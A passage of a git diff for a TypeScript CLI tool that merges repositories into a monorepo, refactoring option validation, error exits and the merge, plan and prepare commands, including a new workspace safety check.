+2,8 @@ import path from 'node:path'; import { execFileSync } from 'node:child_process'; import type { WorkspaceTool, PackageManagerConfig } from '../types/index.js'; import { createLogger } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; +import { parseWorkspaceTool } from '../utils/cli-options.js'; import { ensureDir, writeFile, writeJson, pathExists } from '../utils/fs.js'; import { generateWorkspaceToolConfig, @@ -12,7 +14,7 @@ import { generateWorkspaceFiles, getWorkspacesConfig, getPackageManagerField, - parsePackageManagerType, + tryParsePackageManagerType, validatePackageManager, getPackageManagerDisplayName, getGitignoreEntries, @@ -250,19 +252,32 @@ export async function initCommand( const targetDir = directory ? path.resolve(directory) : process.cwd(); const name = path.basename(targetDir); const packagesDir = options.packagesDir || 'packages'; - const workspaceTool = (options.workspaceTool as WorkspaceTool) || 'none'; + const workspaceTool = parseWorkspaceTool(options.workspaceTool || 'none'); const initGit = options.git !== false; // Default to true const logger = createLogger(options.verbose); + if (!workspaceTool) { + logger.error( + `Invalid workspace tool: ${options.workspaceTool}. Valid options: turbo, nx, none` + ); + throw new CliExitError(); + } + // Determine package manager - const pmType = parsePackageManagerType(options.packageManager || 'pnpm'); + const pmType = tryParsePackageManagerType(options.packageManager || 'pnpm'); + if (!pmType) { + logger.error( + `Invalid package manager: ${options.packageManager}. Valid options: pnpm, yarn, yarn-berry, npm` + ); + throw new CliExitError(); + } // Validate package manager is installed const pmValidation = validatePackageManager(pmType); if (!pmValidation.valid) { logger.error(pmValidation.error!); - process.exit(1); + throw new CliExitError(); } const pmConfig = createPackageManagerConfig(pmType); @@ -274,7 +289,7 @@ export async function initCommand( if (await pathExists(packageJsonPath)) { logger.error(`Directory already contains a package.json: ${targetDir}`); logger.info('Use "monorepo merge" to combine existing repositories.'); - process.exit(1); + throw new CliExitError(); } logger.info(`Initializing monorepo in ${targetDir}...`); @@ -328,8 +343,9 @@ export async function initCommand( } else { logger.debug('Git repository already exists'); } - } catch { - logger.warn('Failed to initialize git repository'); + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + logger.warn(`Failed to initialize git repository: ${message}`); } } @@ -352,6 +368,6 @@ export async function initCommand( } catch (error) { const message = error instanceof Error ? error.message : String(error); logger.error(`Init failed: ${message}`); - process.exit(1); + throw new CliExitError(); } } diff --git a/src/commands/merge.ts b/src/commands/merge.ts index fc04e1e..e724cb3 100755 --- a/src/commands/merge.ts +++ b/src/commands/merge.ts @@ -3,7 +3,6 @@ import { execFileSync } from 'node:child_process'; import chalk from 'chalk'; import type { MergeOptions, - ConflictStrategy, FileCollisionStrategy, WorkspaceTool, WorkflowMergeStrategy, @@ -11,6 +10,7 @@ import type { PackageManagerConfig, } from '../types/index.js'; import { createLogger, formatHeader, formatList } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; import { createTempDir, removeDir, @@ -27,6 +27,11 @@ import { promptFileCollisionStrategy, promptConfirm, } from '../utils/prompts.js'; +import { + parseConflictStrategy, + parseWorkspaceTool, + parseWorkflowStrategy, +} from '../utils/cli-options.js'; import { analyzeDependencies } from '../analyzers/dependencies.js'; import { detectFileCollisions } from '../analyzers/files.js'; import { cloneOrCopyRepos } from '../strategies/copy.js'; @@ -45,6 +50,8 @@ import { } from '../strategies/workspace-tools.js'; import { preserveHistory, checkGitFilterRepo } from '../strategies/history-preserve.js'; import { mergeWorkflows } from '../strategies/workflow-merge.js'; +import { buildApplyPlan } from '../core/plan-builder.js'; +import { applyCommand } from './apply.js'; import { resolveDependencyConflicts, formatConflict, @@ -56,7 +63,7 @@ import { generateWorkspaceFiles, getWorkspacesConfig, getPackageManagerField, - parsePackageManagerType, + tryParsePackageManagerType, validatePackageManager, getPackageManagerDisplayName, } from '../strategies/package-manager.js'; @@ -156,6 +163,30 @@ function printDryRunReport( export async function mergeCommand(repos: string[], options: CLIOptions): Promise { const logger = createLogger(options.verbose); let tempDir: string | null = null; + const parsedConflictStrategy = parseConflictStrategy(options.conflictStrategy); + const parsedWorkspaceTool = parseWorkspaceTool(options.workspaceTool || 'none'); + const parsedWorkflowStrategy = parseWorkflowStrategy(options.workflowStrategy || 'combine'); + + if (!parsedConflictStrategy) { + logger.error( + `Invalid conflict strategy: ${options.conflictStrategy}. Valid options: highest, lowest, prompt` + ); + throw new CliExitError(); + } + + if (!parsedWorkspaceTool) { + logger.error( + `Invalid workspace tool: ${options.workspaceTool}. Valid options: turbo, nx, none` + ); + throw new CliExitError(); + } + + if (!parsedWorkflowStrategy) { + logger.error( + `Invalid workflow strategy: ${options.workflowStrategy}. Valid options: combine, keep-first, keep-last, skip` + ); + throw new CliExitError(); + } // Convert CLI options to MergeOptions (extended with Phase 2 options) const mergeOptions: MergeOptions & { @@ -167,15 +198,15 @@ export async function mergeCommand(repos: string[], options: CLIOptions): Promis packagesDir: options.packagesDir, dryRun: options.dryRun, yes: options.yes, - conflictStrategy: options.conflictStrategy as ConflictStrategy, + conflictStrategy: parsedConflictStrategy, verbose: options.verbose, install: options.install, noHoist: options.hoist === false, // Commander: --no-hoist sets hoist to false pinVersions: options.pinVersions, // Phase 2 options preserveHistory: options.preserveHistory, - workspaceTool: (options.workspaceTool as WorkspaceTool) || 'none', - workflowStrategy: (options.workflowStrategy as WorkflowMergeStrategy) || 'combine', + workspaceTool: parsedWorkspaceTool, + workflowStrategy: parsedWorkflowStrategy, }; // Robust cleanup function - doesn't throw on failure @@ -194,12 +225,19 @@ export async function mergeCommand(repos: string[], options: CLIOptions): Promis process.on('SIGINT', async () => { logger.warn('\nInterrupted. Cleaning up...'); await cleanup(); - process.exit(1); + process.exit(130); // 128 + SIGINT(2) }); try { // Step 0a: Determine package manager to use - let pmType: PackageManagerType = parsePackageManagerType(options.packageManager || 'pnpm'); + const parsedPm = tryParsePackageManagerType(options.packageManager || 'pnpm'); + if (!parsedPm) { + logger.error( + `Invalid package manager: ${options.packageManager}. Valid options: pnpm, yarn, yarn-berry, npm` + ); + throw new CliExitError(); + } + let pmType: PackageManagerType = parsedPm; // Step 0b: Check prerequisites for history preservation if (mergeOptions.preserveHistory) { @@ -210,6 +248,107 @@ export async function mergeCommand(repos: string[], options: CLIOptions): Promis } } + // Unified path: merge = build plan + apply (non-history mode). + if (!mergeOptions.preserveHistory) { + tempDir = await createTempDir('merge-plan-'); + const sourcesDir = path.join(tempDir, 'sources'); + + const built = await buildApplyPlan({ + repos, + outputDir: mergeOptions.output, + packagesDir: mergeOptions.packagesDir, + sourcesDir, + conflictStrategy: mergeOptions.conflictStrategy, + packageManager: pmType, + autoDetectPm: options.autoDetectPm, + workspaceTool: mergeOptions.workspaceTool || 'none', + workflowStrategy: mergeOptions.workflowStrategy || 'combine', + install: mergeOptions.install, + noHoist: mergeOptions.noHoist, + pinVersions: mergeOptions.pinVersions, + yes: mergeOptions.yes, + interactive: !mergeOptions.yes && !mergeOptions.dryRun, + verbose: mergeOptions.verbose, + logger, + promptConflictStrategy, + promptFileCollisionStrategy, + }); + + if (built.depAnalysis.conflicts.length > 0) { + const summary = getConflictSummary(built.depAnalysis.conflicts); + logger.warn( + `Found ${built.depAnalysis.conflicts.length} dependency conflicts ` + + `(${summary.incompatible} incompatible, ${summary.major} major, ${summary.minor} minor)` + ); + } else { + logger.success('No dependency conflicts detected'); + } + + if (built.collisions.length > 0) { + logger.warn(`Found ${built.collisions.length} file collisions`); + } else { + logger.success('No file collisions detected'); + } + + if (mergeOptions.dryRun) { + printDryRunReport( + built.repoPaths, + built.depAnalysis.conflicts, + built.collisions, + mergeOptions, + built.pmConfig + ); + await cleanup(); + return; + } + + if (await pathExists(mergeOptions.output)) { + if (!mergeOptions.yes) { + const overwrite = await promptConfirm( + `Output directory ${mergeOptions.output} already exists. Overwrite?`, + false + ); + if (!overwrite) { + logger.warn('Aborted by user'); + await cleanup(); + return; + } + } + await removeDir(mergeOptions.output); + } + await ensureDir(path.dirname(mergeOptions.output)); + + const transientPlanPath = path.join(tempDir, 'merge.apply-plan.json'); + await writeJson(transientPlanPath, built.plan, { spaces: 2 }); + await applyCommand({ + plan: transientPlanPath, + out: mergeOptions.output, + verbose: mergeOptions.verbose, + }); + + logger.log(''); + logger.success(chalk.bold('Monorepo created successfully!')); + logger.log(''); + logger.log(` ${chalk.cyan('Location:')} ${mergeOptions.output}`); + logger.log(` ${chalk.cyan('Packages:')} ${built.plan.sources.length}`); + logger.log( + ` ${chalk.cyan('Package manager:')} ${getPackageManagerDisplayName( + built.pmConfig.type + )}` + ); + logger.log(''); + logger.log('Next steps:'); + logger.log(` cd ${mergeOptions.output}`); + if (!mergeOptions.install) { + logger.log(` ${built.pmConfig.installCommand}`); + } + logger.log(` ${built.pmConfig.runAllCommand('build')}`); + + await cleanup(); + tempDir = null; + return; + } + // Step 1: Validate repo sources logger.info('Validating repository sources...'); const validation = await validateRepoSources(repos); @@ -218,7 +357,7 @@ export async function mergeCommand(repos: string[], options: CLIOptions): Promis for (const error of validation.errors) { logger.error(error); } - process.exit(1); + throw new CliExitError(); } logger.success(`Found ${validation.sources.length} repositories to merge`); @@ -232,6 +371,7 @@ export async function mergeCommand(repos: string[], options: CLIOptions): Promis const repoPaths = await cloneOrCopyRepos(validation.sources, tempDir, { logger, verbose: mergeOptions.verbose, + shallow: !mergeOptions.preserveHistory, // full clone needed for history preservation }); // Step 3b: Auto-detect package manager if requested @@ -250,7 +390,7 @@ export async function mergeCommand(repos: string[], options: CLIOptions): Promis if (!pmValidation.valid) { logger.error(pmValidation.error!); await cleanup(); - process.exit(1); + throw new CliExitError(); } // Create package manager config @@ -349,8 +489,9 @@ export async function mergeCommand(repos: string[], options: CLIOptions): Promis stdio: 'pipe', }); logger.debug('Initialized git repository in output directory'); - } catch { - // Git may already be initialized + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + logger.debug(`git init skipped in output directory: ${message}`); } for (const repo of repoPaths) { @@ -526,9 +667,9 @@ resolution-mode=lowest const hasGitignoreCollision = collisions.some((c) => c.path === '.gitignore'); if (!hasGitignoreCollision) { // Check if any repo has a .gitignore and merge them all - const gitignorePaths = movedRepoPaths - .map((r) => path.join(r.path, '.gitignore')) - .filter(async (p) => await pathExists(p)); + const allGitignorePaths = movedRepoPaths.map((r) => path.join(r.path, '.gitignore')); + const gitignoreExists = await Promise.all(allGitignorePaths.map((p) => pathExists(p))); + const gitignorePaths = allGitignorePaths.filter((_, i) => gitignoreExists[i]); if (gitignorePaths.length > 0) { const merged = await mergeGitignores(gitignorePaths); @@ -604,6 +745,6 @@ dist/ } await cleanup(); - process.exit(1); + throw new CliExitError(); } } diff --git a/src/commands/migrate-branch.ts b/src/commands/migrate-branch.ts new file mode 100755 index 0000000..7bcb3ea --- /dev/null +++ b/src/commands/migrate-branch.ts @@ -0,0 +1,71 @@ +import path from 'node:path'; +import { createLogger } from '../utils/logger.js'; +import { writeJson } from '../utils/fs.js'; +import { generateBranchPlan, applyBranchPlan } from '../strategies/migrate-branch.js'; +import type { BranchMigrateStrategy } from '../types/index.js'; + +interface CLIMigrateBranchOptions { + from: string; + to: string; + strategy: string; + out?: string; + apply?: boolean; + verbose?: boolean; +} + +export async function migrateBranchCommand( + branch: string, + options: CLIMigrateBranchOptions, +): Promise { + const logger = createLogger(options.verbose); + const strategy = options.strategy as BranchMigrateStrategy; + + try { + logger.info(`Generating branch migration plan for '${branch}'...`); + logger.info(`Strategy: ${strategy} ${strategy === 'replay' ? '(experimental)' : '(recommended)'}`); + + const plan = await generateBranchPlan( + branch, + path.resolve(options.from), + path.resolve(options.to), + strategy, + logger, + ); + + // Write plan + const planPath = options.out || `branch-plan-${branch}.json`; + const absPath = path.resolve(planPath); + await writeJson(absPath, plan); + logger.success(`Branch plan written to ${absPath}`); + + // Print dry-run report + if (plan.dryRunReport) { + logger.info(`\nDry-Run Report:`); + logger.info(` Branch: ${plan.branch}`); + logger.info(` Commits: ${plan.dryRunReport.commitCount}`); + logger.info(` Estimated time: ${plan.dryRunReport.estimatedTime}`); + logger.info(` Contributors: ${plan.dryRunReport.contributors.join(', ') || 'none'}`); + } + + logger.info(`\nOperations (${plan.operations.length}):`); + for (const op of plan.operations) { + logger.info(` ${op.id}: ${op.description}`); + } + + // Apply if requested + if (options.apply) { + logger.info('\nApplying branch migration...'); + // Derive subdir from source repo name + const repoName = path.basename(plan.sourceRepo); + const subdir = `packages/${repoName}`; + await applyBranchPlan(plan, subdir, logger); + logger.success(`Branch '${branch}' migrated successfully`); + } else { + logger.info(`\nTo apply: monorepo migrate-branch ${branch} --from ${options.from} --to ${options.to} --strategy ${strategy} --apply`); + } + } catch (err: unknown) { + const msg = err instanceof Error ? err.message : String(err); + logger.error(`Branch migration failed: ${msg}`); + process.exitCode = 1; + } +} diff --git a/src/commands/plan.ts b/src/commands/plan.ts index e94ad64..16d9f84 100755 --- a/src/commands/plan.ts +++ b/src/commands/plan.ts @@ -2,63 +2,33 @@ import path from 'node:path'; import chalk from 'chalk'; import type { ConflictStrategy, - FileCollisionStrategy, + PackageManagerType, WorkspaceTool, WorkflowMergeStrategy, - PackageManagerType, - ApplyPlan, - PlanFile, } from '../types/index.js'; import { createLogger } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; import { - createTempDir, removeDir, ensureDir, writeJson, - readJson, - pathExists, } from '../utils/fs.js'; -import { validateRepoSources } from '../utils/validation.js'; import { promptConflictStrategy, promptFileCollisionStrategy, } from '../utils/prompts.js'; -import { analyzeDependencies } from '../analyzers/dependencies.js'; -import { detectFileCollisions } from '../analyzers/files.js'; -import { cloneOrCopyRepos } from '../strategies/copy.js'; -import { - generateRootReadme, - mergeGitignores, - resolveFileCollisionToContent, -} from '../strategies/merge-files.js'; import { - generateWorkspaceConfig, -} from '../strategies/workspace-config.js'; + parseConflictStrategy, + parseWorkspaceTool, + parseWorkflowStrategy, +} from '../utils/cli-options.js'; +import { getConflictSummary } from '../resolvers/dependencies.js'; import { - generateWorkspaceToolConfig, - getWorkspaceToolDependencies, - updateScriptsForWorkspaceTool, -} from '../strategies/workspace-tools.js'; -import { mergeWorkflowsToFiles } from '../strategies/workflow-merge.js'; -import { - resolveDependencyConflicts, - getConflictSummary, -} from '../resolvers/dependencies.js'; -import { - createPackageManagerConfig, - detectPackageManagerFromSources, - generateWorkspaceFiles, - getWorkspacesConfig, - getGitignoreEntries, - getPackageManagerField, - parsePackageManagerType, - validatePackageManager, getPackageManagerDisplayName, + tryParsePackageManagerType, } from '../strategies/package-manager.js'; +import { buildApplyPlan } from '../core/plan-builder.js'; -/** - * CLI options passed from commander - */ interface CLIPlanOptions { output: string; packagesDir: string; @@ -75,339 +45,122 @@ interface CLIPlanOptions { workflowStrategy?: string; } -/** - * Main plan command handler. - * Mirrors the merge command flow but serializes an ApplyPlan instead of writing to disk. - */ export async function planCommand(repos: string[], options: CLIPlanOptions): Promise { const logger = createLogger(options.verbose); - let tempDir: string | null = null; const outputDir = path.resolve(options.output); const packagesDir = options.packagesDir; - const workspaceTool = (options.workspaceTool as WorkspaceTool) || 'none'; - const workflowStrategy = (options.workflowStrategy as WorkflowMergeStrategy) || 'combine'; - const noHoist = options.hoist === false; const yes = options.yes ?? false; + const noHoist = options.hoist === false; + + const workspaceTool = parseWorkspaceTool(options.workspaceTool || 'none'); + const workflowStrategy = parseWorkflowStrategy(options.workflowStrategy || 'combine'); + const parsedConflictStrategy = parseConflictStrategy(options.conflictStrategy); + const parsedPm = tryParsePackageManagerType(options.packageManager || 'pnpm'); + + if (!workspaceTool) { + logger.error( + `Invalid workspace tool: ${options.workspaceTool}. Valid options: turbo, nx, none` + ); + throw new CliExitError(); + } + + if (!workflowStrategy) { + logger.error( + `Invalid workflow strategy: ${options.workflowStrategy}. Valid options: combine, keep-first, keep-last, skip` + ); + throw new CliExitError(); + } + + if (!parsedConflictStrategy) { + logger.error( + `Invalid conflict strategy: ${options.conflictStrategy}. Valid options: highest, lowest, prompt` + ); + throw new CliExitError(); + } + + if (!parsedPm) { + logger.error( + `Invalid package manager: ${options.packageManager}. Valid options: pnpm, yarn, yarn-berry, npm` + ); + throw new CliExitError(); + } - // Determine plan file path const planFilePath = options.planFile ? path.resolve(options.planFile) : path.resolve(`${path.basename(outputDir)}.plan.json`); - - // Sources directory: co-located with plan file const sourcesDir = `${planFilePath}.sources`; - // Robust cleanup function - const cleanup = async () => { - if (tempDir) { - try { - logger.debug(`Cleaning up temp directory: ${tempDir}`); - await removeDir(tempDir); - } catch (error) { - logger.warn(`Failed to cleanup temp directory: ${error instanceof Error ? error.message : String(error)}`); - } + const cleanupSources = async () => { + try { + await removeDir(sourcesDir); + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + logger.debug(`Failed to clean plan sources directory ${sourcesDir}: ${message}`); } }; - process.on('SIGINT', async () => { + const onSigint = async () => { logger.warn('\nInterrupted. Cleaning up...'); - await cleanup(); - process.exit(1); - }); + await cleanupSources(); + process.exit(130); + }; + process.on('SIGINT', onSigint); try { - // Step 1: Determine package manager - let pmType: PackageManagerType = parsePackageManagerType(options.packageManager || 'pnpm'); - - // Step 2: Validate repo sources - logger.info('Validating repository sources...'); - const validation = await validateRepoSources(repos); - - if (!validation.valid) { - for (const error of validation.errors) { - logger.error(error); - } - process.exit(1); - } - - logger.success(`Found ${validation.sources.length} repositories to merge`); - - // Step 3: Clone/copy repos into the persistent sources directory await ensureDir(sourcesDir); - logger.info('Fetching repositories...'); - const repoPaths = await cloneOrCopyRepos(validation.sources, sourcesDir, { - logger, + + const result = await buildApplyPlan({ + repos, + outputDir, + packagesDir, + sourcesDir, + conflictStrategy: parsedConflictStrategy, + packageManager: parsedPm, + autoDetectPm: options.autoDetectPm, + workspaceTool, + workflowStrategy, + install: options.install, + noHoist, + pinVersions: options.pinVersions, + yes, + interactive: !yes, verbose: options.verbose, + logger, + promptConflictStrategy, + promptFileCollisionStrategy, }); - // Step 4: Auto-detect package manager if requested - if (options.autoDetectPm) { - const detected = await detectPackageManagerFromSources(repoPaths); - if (detected) { - pmType = detected; - logger.info(`Auto-detected package manager: ${getPackageManagerDisplayName(pmType)}`); - } else { - logger.debug('No package manager detected from sources, using default'); - } - } - - // Step 5: Validate package manager is installed - const pmValidation = validatePackageManager(pmType); - if (!pmValidation.valid) { - logger.error(pmValidation.error!); - process.exit(1); - } - - const pmConfig = createPackageManagerConfig(pmType); - logger.debug(`Using package manager: ${getPackageManagerDisplayName(pmType)} v${pmConfig.version}`); - - // Step 6: Analyze dependencies - logger.info('Analyzing dependencies...'); - const depAnalysis = await analyzeDependencies(repoPaths); - - if (depAnalysis.conflicts.length > 0) { - const summary = getConflictSummary(depAnalysis.conflicts); + if (result.depAnalysis.conflicts.length > 0) { + const summary = getConflictSummary(result.depAnalysis.conflicts); logger.warn( - `Found ${depAnalysis.conflicts.length} dependency conflicts ` + - `(${summary.incompatible} incompatible, ${summary.major} major, ${summary.minor} minor)` + `Found ${result.depAnalysis.conflicts.length} dependency conflicts ` + + `(${summary.incompatible} incompatible, ${summary.major} major, ${summary.minor} minor)` ); } else { logger.success('No dependency conflicts detected'); } - // Step 7: Detect file collisions - logger.info('Detecting file collisions...'); - const collisions = await detectFileCollisions(repoPaths); - - if (collisions.length > 0) { - logger.warn(`Found ${collisions.length} file collisions`); + if (result.collisions.length > 0) { + logger.warn(`Found ${result.collisions.length} file collisions`); } else { logger.success('No file collisions detected'); } - // Step 8: Resolve dependency conflicts - let conflictStrategy = options.conflictStrategy as ConflictStrategy; - - if (depAnalysis.conflicts.length > 0 && conflictStrategy === 'prompt' && !yes) { - conflictStrategy = await promptConflictStrategy(); - } else if (yes && conflictStrategy === 'prompt') { - conflictStrategy = 'highest'; - } - - const resolvedDeps = await resolveDependencyConflicts( - depAnalysis.conflicts, - conflictStrategy, - depAnalysis.resolvedDependencies, - depAnalysis.resolvedDevDependencies - ); - - // Step 9: Resolve file collision strategies - const fileStrategies = new Map(); - - for (const collision of collisions) { - let strategy = collision.suggestedStrategy as FileCollisionStrategy; - - if (!yes && collision.suggestedStrategy !== 'skip') { - strategy = await promptFileCollisionStrategy(collision); - } - - fileStrategies.set(collision.path, strategy); - } - - // Step 10: Generate workspace config - const workspaceConfig = generateWorkspaceConfig(depAnalysis.packages, { - rootName: path.basename(outputDir), - packagesDir, - dependencies: noHoist ? {} : resolvedDeps.dependencies, - devDependencies: noHoist ? {} : resolvedDeps.devDependencies, - pmConfig, - }); - - if (noHoist) { - logger.debug('Using --no-hoist: dependencies stay in each package'); - } - - // Step 10b: Update scripts for workspace tool - if (workspaceTool !== 'none') { - const availableScripts = Object.keys(workspaceConfig.rootPackageJson.scripts as Record || {}); - const updatedScripts = updateScriptsForWorkspaceTool( - workspaceConfig.rootPackageJson.scripts as Record, - workspaceTool, - availableScripts - ); - workspaceConfig.rootPackageJson.scripts = updatedScripts; - - const toolDeps = getWorkspaceToolDependencies(workspaceTool); - const existingDevDeps = (workspaceConfig.rootPackageJson.devDependencies as Record) || {}; - workspaceConfig.rootPackageJson.devDependencies = { ...existingDevDeps, ...toolDeps }; - logger.debug(`Configured for ${workspaceTool} workspace tool`); - } - - // Add workspaces field for yarn/npm - const workspacesConfig = getWorkspacesConfig(pmConfig, packagesDir); - if (workspacesConfig) { - workspaceConfig.rootPackageJson.workspaces = workspacesConfig; - } - - // Set packageManager field - workspaceConfig.rootPackageJson.packageManager = getPackageManagerField(pmConfig); - - // Collect all plan files - const planFiles: PlanFile[] = []; - - // Step 11: Workspace files (pnpm-workspace.yaml for pnpm) - const workspaceFilesList = generateWorkspaceFiles(pmConfig, packagesDir); - for (const file of workspaceFilesList) { - planFiles.push({ relativePath: file.filename, content: file.content }); - } - - // Step 12: Workspace tool config (turbo.json / nx.json) - if (workspaceTool !== 'none') { - const toolConfig = generateWorkspaceToolConfig(depAnalysis.packages, workspaceTool); - if (toolConfig) { - planFiles.push({ relativePath: toolConfig.filename, content: toolConfig.content }); - } - } - - // Step 13: Merge workflows - if (workflowStrategy !== 'skip') { - logger.info('Processing CI/CD workflows...'); - try { - const workflowFiles = await mergeWorkflowsToFiles(repoPaths, workflowStrategy); - planFiles.push(...workflowFiles.map(f => ({ relativePath: f.relativePath, content: f.content }))); - if (workflowFiles.length > 0) { - logger.debug(`Prepared ${workflowFiles.length} workflow file(s)`); - } - } catch (error) { - logger.warn(`Failed to process workflows: ${error instanceof Error ? error.message : String(error)}`); - } - } - - // Step 14: Handle file collisions - for (const collision of collisions) { - const strategy = fileStrategies.get(collision.path) || collision.suggestedStrategy as FileCollisionStrategy; - const collisionFiles = await resolveFileCollisionToContent(collision, strategy, repoPaths); - planFiles.push(...collisionFiles.map(f => ({ relativePath: f.relativePath, content: f.content }))); - } - - // Step 15: Generate .gitignore - const hasGitignoreCollision = collisions.some((c) => c.path === '.gitignore'); - if (!hasGitignoreCollision) { - const gitignorePaths: string[] = []; - for (const r of repoPaths) { - const p = path.join(r.path, '.gitignore'); - if (await pathExists(p)) { - gitignorePaths.push(p); - } - } - - let gitignoreContent: string; - if (gitignorePaths.length > 0) { - gitignoreContent = await mergeGitignores(gitignorePaths); - } else { - gitignoreContent = `node_modules/\ndist/\n.DS_Store\n*.log\n`; - } - - // Append PM-specific entries - const pmEntries = getGitignoreEntries(pmConfig); - if (pmEntries.length > 0) { - gitignoreContent += '\n# Package manager\n' + pmEntries.join('\n') + '\n'; - } - - planFiles.push({ relativePath: '.gitignore', content: gitignoreContent }); - } - - // Step 16: Generate README - const readmeContent = generateRootReadme( - repoPaths.map((r) => r.name), - packagesDir, - pmConfig - ); - planFiles.push({ relativePath: 'README.md', content: readmeContent }); - - // Step 17: Generate .npmrc if --no-hoist - if (noHoist) { - const npmrcContent = `# Prevent dependency hoisting - each package manages its own dependencies -# This helps avoid type conflicts between packages with different version requirements -shamefully-hoist=false -hoist=false - -# Use lowest satisfying versions to avoid breaking changes in newer releases -resolution-mode=lowest -`; - planFiles.push({ relativePath: '.npmrc', content: npmrcContent }); - } - - // Step 18: Pin versions in source package.jsons if requested - if (options.pinVersions) { - logger.debug('Pinning dependency versions (removing ^ and ~ ranges)'); - for (const repo of repoPaths) { - const pkgJsonPath = path.join(repo.path, 'package.json'); - if (await pathExists(pkgJsonPath)) { - try { - const pkgJson = await readJson>(pkgJsonPath); - let modified = false; - - const pinDeps = (deps: Record | undefined): Record | undefined => { - if (!deps) return deps; - const pinned: Record = {}; - for (const [name, version] of Object.entries(deps)) { - if (version.startsWith('^') || version.startsWith('~')) { - pinned[name] = version.slice(1); - modified = true; - } else { - pinned[name] = version; - } - } - return pinned; - }; - - pkgJson.dependencies = pinDeps(pkgJson.dependencies as Record); - pkgJson.devDependencies = pinDeps(pkgJson.devDependencies as Record); - pkgJson.peerDependencies = pinDeps(pkgJson.peerDependencies as Record); - - if (modified) { - await writeJson(pkgJsonPath, pkgJson, { spaces: 2 }); - logger.debug(`Pinned versions in ${repo.name}/package.json`); - } - } catch (error) { - logger.warn(`Failed to pin versions in ${repo.name}: ${error instanceof Error ? error.message : String(error)}`); - } - } - } - } - - // Step 19: Assemble the ApplyPlan - const plan: ApplyPlan = { - version: 1, - sources: repoPaths.map((r) => ({ name: r.name, path: r.path })), - packagesDir, - rootPackageJson: workspaceConfig.rootPackageJson, - files: planFiles, - install: options.install, - installCommand: pmConfig.installCommand, - analysisFindings: depAnalysis.findings, - }; - - // Step 20: Write plan file await ensureDir(path.dirname(planFilePath)); - await writeJson(planFilePath, plan, { spaces: 2 }); + await writeJson(planFilePath, result.plan, { spaces: 2 }); - // Step 21: Print summary logger.log(''); logger.success(chalk.bold('Plan generated successfully!')); logger.log(''); logger.log(` ${chalk.cyan('Plan file:')} ${planFilePath}`); logger.log(` ${chalk.cyan('Sources:')} ${sourcesDir}`); - logger.log(` ${chalk.cyan('Packages:')} ${repoPaths.length}`); - logger.log(` ${chalk.cyan('Package manager:')} ${getPackageManagerDisplayName(pmType)}`); - logger.log(` ${chalk.cyan('Extra files:')} ${planFiles.length}`); + logger.log(` ${chalk.cyan('Packages:')} ${result.repoPaths.length}`); + logger.log(` ${chalk.cyan('Package manager:')} ${getPackageManagerDisplayName(result.pmType)}`); + logger.log(` ${chalk.cyan('Extra files:')} ${result.plan.files.length}`); - if (depAnalysis.conflicts.length > 0) { - logger.log( - ` ${chalk.cyan('Resolved conflicts:')} ${depAnalysis.conflicts.length}` - ); + if (result.depAnalysis.conflicts.length > 0) { + logger.log(` ${chalk.cyan('Resolved conflicts:')} ${result.depAnalysis.conflicts.length}`); } logger.log(''); @@ -421,12 +174,23 @@ resolution-mode=lowest } catch (error) { const message = error instanceof Error ? error.message : String(error); logger.error(`Plan failed: ${message}`); - if (options.verbose && error instanceof Error && error.stack) { logger.debug(error.stack); } - - await cleanup(); - process.exit(1); + await cleanupSources(); + throw new CliExitError(); + } finally { + process.removeListener('SIGINT', onSigint); } } + +export type PlanCommandDeps = { + _unused?: never; +}; + +export type PlanCommandOptions = { + conflictStrategy: ConflictStrategy; + workspaceTool: WorkspaceTool; + workflowStrategy: WorkflowMergeStrategy; + packageManager: PackageManagerType; +}; diff --git a/src/commands/prepare.ts b/src/commands/prepare.ts index a95a18f..531952c 100755 --- a/src/commands/prepare.ts +++ b/src/commands/prepare.ts @@ -2,6 +2,7 @@ import path from 'node:path'; import { execFileSync } from 'node:child_process'; import chalk from 'chalk'; import { createLogger, formatHeader } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; import { createTempDir, removeDir, @@ -24,7 +25,9 @@ interface CLIPrepareOptions { patchOnly?: boolean; outDir?: string; prepWorkspace?: string; + out?: string; verbose?: boolean; + json?: boolean; } /** @@ -38,7 +41,7 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions // Validate mutually exclusive flags if (options.patchOnly && options.prepWorkspace) { logger.error('--patch-only and --prep-workspace are mutually exclusive'); - process.exit(1); + throw new CliExitError(); } // Robust cleanup function @@ -56,7 +59,7 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions process.on('SIGINT', async () => { logger.warn('\nInterrupted. Cleaning up...'); await cleanup(); - process.exit(1); + process.exit(130); // 128 + SIGINT(2) }); try { @@ -68,7 +71,7 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions for (const error of validation.errors) { logger.error(error); } - process.exit(1); + throw new CliExitError(); } logger.success(`Found ${validation.sources.length} repositories to prepare`); @@ -116,6 +119,15 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions // --prep-workspace mode: apply patches, commit on branch const workspaceDir = path.resolve(options.prepWorkspace); const branchName = 'prepare/monotize'; + const successfullyAppliedPatches: string[] = []; + + // Safety check: only apply patches to repos cloned/copied inside the prep workspace. + for (const repo of repoPaths) { + const rel = path.relative(workspaceDir, repo.path); + if (rel.startsWith('..') || path.isAbsolute(rel)) { + throw new Error(`Safety check failed: refusing to modify repo outside workspace (${repo.path})`); + } + } for (const repo of repoPaths) { // Initialize git if needed (local copies may not have .git) @@ -132,30 +144,51 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions // Apply patches for this repo const repoPatches = analysis.patches.filter((p) => p.repoName === repo.name); + const applied: string[] = []; + const failed: string[] = []; for (const patch of repoPatches) { const patchPath = path.join(repo.path, '__temp_patch.diff'); await writeFile(patchPath, patch.content); try { execFileSync('git', ['apply', patchPath], { cwd: repo.path, stdio: 'pipe' }); + applied.push(patch.filename); + successfullyAppliedPatches.push(patch.filename); } catch (applyError) { logger.warn(`Failed to apply patch ${patch.filename}: ${applyError instanceof Error ? applyError.message : String(applyError)}`); + failed.push(patch.filename); } // Remove temp patch file await removeDir(patchPath); } - if (repoPatches.length > 0) { + if (applied.length > 0) { // Stage and commit execFileSync('git', ['add', '-A'], { cwd: repo.path, stdio: 'pipe' }); - execFileSync( - 'git', - ['-c', 'user.email=monotize@monotize.dev', 